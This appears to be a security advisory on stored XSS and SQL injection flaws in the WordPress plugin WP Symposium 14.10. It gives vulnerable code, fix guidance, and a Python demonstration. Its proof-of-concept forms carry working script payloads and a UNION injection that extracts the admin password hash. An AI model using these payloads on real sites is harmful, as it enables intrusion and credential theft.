WP Symposium 14.10 Multiple XSS and SQL Injection

Homepage:

https://wordpress.org/plugins/wp-symposium/

CVE-ID

CVE-2014-8809

CVE-2014-8810

CVSS Score

4.0 (CVSS v2)

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

$_POST['text'] is stored verbatim and later rendered without output escaping (stored XSS). The INSERT itself is parameterised, so this is not SQL injection; the problem is the missing HTML escaping on output.

File: wp-symposium\ajax\profile_functions.php

$uid = $_POST['uid'];
$text = $_POST['text'];        // raw request value, no sanitisation
$parent = $_POST['parent'];

if (is_user_logged_in()) {

	if ( ($text != __(addslashes("Write a comment..."), "wp-symposium")) && ($text != '') ) {

		// The %s binding makes the INSERT SQL-safe, but $text is stored as-is and
		// is echoed unescaped when the profile wall is rendered (stored XSS).
		$wpdb->query( $wpdb->prepare( "
			INSERT INTO ".$wpdb->base_prefix."symposium_comments
			( 	subject_uid, 
				author_uid,
				comment_parent,
				comment_timestamp,
				comment,
				is_group
			)
			VALUES ( %d, %d, %d, %s, %s, %s )",
	        array(
	        	$uid,
	        	$current_user->ID,
	        	$parent,
	        	date("Y-m-d H:i:s"),
	        	$text,
	        	''
	        	)
	        ) );
	}
}

$_POST['compose_text'] is stored verbatim and later rendered without output escaping (stored XSS in the recipient's mailbox). Note that only the subject is passed through strip_tags(); the message body is not.

File: wp-symposium\ajax\mail_functions.php

$subject = strip_tags($_POST['compose_subject']);   // tags stripped here...
$message = $_POST['compose_text'];                   // ...but not here
$previous = $_POST['compose_previous'];
$message = $message.$previous;
// Send mail: $wpdb->insert() escapes the values for SQL, so the markup is stored
// intact and reaches the recipient's browser unescaped.
if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_mail", array(
		'mail_from' => $current_user->ID,
		'mail_to' => $recipient->ID,
		'mail_sent' => date("Y-m-d H:i:s"),
		'mail_subject' => $subject,
		'mail_message' => $message
	) ) ) {
	$return = __('Message sent to', WPS_TEXT_DOMAIN).' '.$recipient->display_name;
} else {
	$return = '<p><strong>'.__('There was a problem sending your mail to', WPS_TEXT_DOMAIN).' '.$recipient->display_name.'.</strong></p>';
}

$_POST['comment'] is stored verbatim and later rendered without output escaping (stored XSS on the lounge page).

File: wp-symposium\ajax\lounge_functions.php

$comment = $_POST['comment'];   // raw request value, no sanitisation

if ( ($comment != __(addslashes("Add a comment.."), "wp-symposium")) && ($comment != '') ) {

	// SQL-safe via %s binding; the stored markup is later output unescaped.
	$wpdb->query( $wpdb->prepare( "
		INSERT INTO ".$wpdb->base_prefix."symposium_lounge
		( 	author, 
			added,
			comment
		)
		VALUES ( %d, %s, %s )",
        array(
        	$current_user->ID,
        	date("Y-m-d H:i:s"),
        	$comment
        	)
    	) );
}

$_POST['name'] is stored verbatim and later rendered without output escaping (stored XSS in the gallery album name).

File: wp-symposium\ajax\gallery_functions.php

$name = $_POST['name'];         // raw request value, no sanitisation
$sub_album = $_POST['sub_album'];
if ($sub_album == 'true') {
	$parent = $_POST['parent'];
} else {
	$parent = 0;
}

// Create new album
$wpdb->query( $wpdb->prepare( "
INSERT INTO ".$wpdb->base_prefix."symposium_gallery
( 	parent_gid, 
	name,
	description, 
	owner, 
	sharing, 
	editing, 
	created, 
	updated, 
	is_group
)
VALUES ( %d, %s, %s, %d, %s, %s, %s, %s, %s )",
array(
	$parent,
	$name,
	'',
	$current_user->ID,
	'everyone',
	'nobody',
	date("Y-m-d H:i:s"),
	date("Y-m-d H:i:s"),
	''
	)
) );

$_POST['tray'] is concatenated straight into a SELECT, inside a column name, with no validation (SQL injection). Because the result is fetched with $wpdb->get_var(), the first column of the first returned row is reflected back to the caller, so a UNION payload can read arbitrary data from the database.

File: wp-symposium\ajax\mail_functions.php

$tray = $_POST['tray'];   // expected to be 'in' or 'out'; never checked
// $tray is spliced into the identifier "mail_<tray>_deleted"; identifiers cannot be
// bound with prepare(), so the only fix is a whitelist of allowed tray names.
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");

Proof of Concept:

Authentication is required for all of the requests below except the lounge and gallery XSS.

Profile page XSS, visible at:

http://wordpress-instalation/?page_id=%profile_page_id%&uid=%user_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
    <input type="hidden" name="action" value="addComment">
    <input type="hidden" name="parent" value="0"><br />
    XSS: <input type="text" name="text" value="&lt;script&gt;alert(String.fromCharCode(88,83,83,50));&lt;/script&gt;"><br />
    <input type="submit" value="Add profile comment">
</form>

Then make your profile public so the comment is shown to other users:

<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
    <input type="hidden" name="action" value="updatePersonal">
    My User ID: <input type="text" name="uid"><br />
    <input type="hidden" name="wall_share" value="public">
    <input type="hidden" name="share" value="public">
    <input type="submit" value="Make profile public">
</form>

User mailbox XSS, visible (to the recipient) at:

http://wordpress-instalation/?page_id=%mail_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
    <input type="hidden" name="action" value="sendMail">
    Recipient User ID: <input type="text" name="compose_recipient_id"><br />
    Title: <input type="text" name="compose_subject" value="My title"><br />
    XSS: <input type="text" name="compose_text" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Send message to another user">
</form>

Lounge XSS, visible at:

http://wordpress-instalation/?page_id=%lounge_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/lounge_functions.php">
    <input type="hidden" name="action" value="add_comment">
    XSS: <input type="text" name="comment" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Add lounge post">
</form>

Gallery XSS, visible at:

http://wordpress-instalation/?page_id=%gallery_page_id%&embed=on&album_id=%album_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/gallery_functions.php">
    <input type="hidden" name="action" value="create_album">
    <input type="hidden" name="sub_album" value="false">
    XSS: <input type="text" name="name" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Create gallery">
</form><br />

Mail tray SQL injection:

The message ID must belong to one of your own sent messages (find it on the user mailbox page -> Sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread"). The payload below closes the mail_in_deleted comparison, appends a UNION that selects the administrator's password hash, and uses LIMIT 1, 1 to skip the COUNT(*) row so that get_var() returns the hash; the trailing "-- " comments out the rest of the original WHERE clause. The payload hardcodes the default wp_ table prefix, so adjust it if the target uses a different prefix.

<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
    <input type="hidden" name="action" value="getMailMessage">
    Message ID: <input type="text" name="mid"><br />
    SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- "><br />
    <input type="submit" value="Inject">
</form>

The returned value appears in the response between "[split]YOUR_RETURNED_VALUE[split]".
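To show concretely why the tray payload returns the password hash, and why the parameterised INSERTs in the Description are SQL-safe but still produce stored XSS, here is an added example in Python against an in-memory SQLite database. It is not the plugin's code: the schema and rows are constructed for the demonstration (only the columns the advisory's queries touch, plus an assumed wp_users row with a fake hash), get_var() mimics $wpdb->get_var(), and the payload is the advisory's tray value minus the parentheses around the UNION'd SELECT, which MySQL accepts but SQLite rejects. The hardened variant maps the tray name to a fixed column via a whitelist and binds the integer, and render_comment() shows the output-side fix (what esc_html() does in WordPress).

```python
import html
import sqlite3

# Constructed sample schema (not the plugin's installer): only the columns the
# advisory's queries touch, plus an assumed wp_users row with a fake hash.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
CREATE TABLE wp_symposium_mail (
    mid INTEGER PRIMARY KEY, mail_from INTEGER, mail_to INTEGER,
    mail_in_deleted TEXT DEFAULT '', mail_out_deleted TEXT DEFAULT '',
    mail_read TEXT DEFAULT '', mail_subject TEXT, mail_message TEXT
);
CREATE TABLE wp_symposium_lounge (lid INTEGER PRIMARY KEY, author INTEGER, comment TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedSampleHashNotReal00000');
INSERT INTO wp_symposium_mail (mid, mail_from, mail_to, mail_read, mail_subject, mail_message)
    VALUES (1, 2, 3, 'on', 'hi', 'hello'), (2, 2, 3, '', 're', 'again');
"""

FAKE_ADMIN_HASH = "$P$BconstructedSampleHashNotReal00000"   # constructed, not a real hash
XSS = "<script>alert(String.fromCharCode(88,83,83));</script>"

# The advisory's tray payload, minus the parentheses around the UNION'd SELECT,
# which MySQL accepts but SQLite rejects; the logic is otherwise the same.
PAYLOAD = "in_deleted = 1 UNION SELECT user_pass FROM wp_users WHERE ID=1 LIMIT 1, 1 -- "


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def get_var(db, sql, params=()):
    """Mimic $wpdb->get_var(): first column of the first row, or None."""
    row = db.execute(sql, params).fetchone()
    return None if row is None else row[0]


def unread_count_vulnerable(db, mail_from, tray):
    """Same concatenation as mail_functions.php: tray lands inside a column name."""
    sql = ("SELECT COUNT(*) FROM wp_symposium_mail WHERE mail_from = " + str(mail_from)
           + " AND mail_" + tray + "_deleted != 'on' AND mail_read != 'on'")
    return get_var(db, sql)


# Identifiers cannot be bound as parameters, so the request value is mapped to a
# fixed column name and anything else is refused; the integer is bound normally.
ALLOWED_TRAYS = {"in": "mail_in_deleted", "out": "mail_out_deleted"}


def unread_count_hardened(db, mail_from, tray):
    column = ALLOWED_TRAYS.get(tray)
    if column is None:
        raise ValueError("invalid tray")
    sql = ("SELECT COUNT(*) FROM wp_symposium_mail WHERE mail_from = ? AND "
           + column + " != 'on' AND mail_read != 'on'")
    return get_var(db, sql, (int(mail_from),))


def store_comment(db, author, text):
    """Parameterised INSERT, as $wpdb->prepare() gives: the markup is stored verbatim.
    That is correct at the SQL layer; it becomes XSS only when echoed unescaped."""
    db.execute("INSERT INTO wp_symposium_lounge (author, comment) VALUES (?, ?)", (author, text))
    return get_var(db, "SELECT comment FROM wp_symposium_lounge WHERE author = ?", (author,))


def render_comment(text, escape=True):
    """Output-side fix: HTML-encode the stored value at render time (esc_html() in WordPress)."""
    body = html.escape(text, quote=True) if escape else text
    return '<div class="comment">' + body + "</div>"


if __name__ == "__main__":
    db = connect()
    print(unread_count_vulnerable(db, 2, "in"))      # legitimate unread count
    print(unread_count_vulnerable(db, 2, PAYLOAD))   # the admin's password hash instead
    stored = store_comment(db, 5, XSS)
    print(render_comment(stored, escape=False))      # script tag reaches the browser
    print(render_comment(stored))                    # encoded, rendered as text
```

The UNION result has two rows, the COUNT(*) and the selected user_pass; LIMIT 1, 1 (offset 1, one row) drops the count, which is why the hash is what get_var() hands back. The whitelist is the right fix for the tray parameter because prepare() can only bind values, not identifiers; for the four stored-XSS cases the fix belongs at output time, since the database layer was never the problem.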

Timeline: